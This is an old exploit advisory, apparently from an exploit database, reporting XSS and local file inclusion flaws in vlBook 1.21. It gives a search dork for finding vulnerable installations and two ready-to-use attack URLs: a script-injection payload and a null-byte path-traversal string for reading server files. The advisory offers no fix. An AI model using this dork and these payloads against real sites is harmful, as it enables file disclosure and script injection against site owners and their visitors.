vlBook 1.21 (ALL VERSION)

2008-05-15
ID: 70956
CVE: None
Download vulnerable application: None
----------------------------------------------------------------

Script : 

Type : Multiple Remote Vulnerabilities (LFI/XSS)

----------------------------------------------------------------

Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)

----------------------------------------------------------------

Our Site : http://IRCRASH.COM

----------------------------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

----------------------------------------------------------------

Script Download : http://home.vlab.info/vlbook_1.21.zip

----------------------------------------------------------------

DORK : "Powered by  vlBook 1.21"

----------------------------------------------------------------

#XSS Address : http://example/?l=" <script>alert('xss')</script>

----------------------------------------------------------------

#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00

----------------------------------------------------------------

TNx : God......

----------------------------------------------------------------
1-4-2 (www02)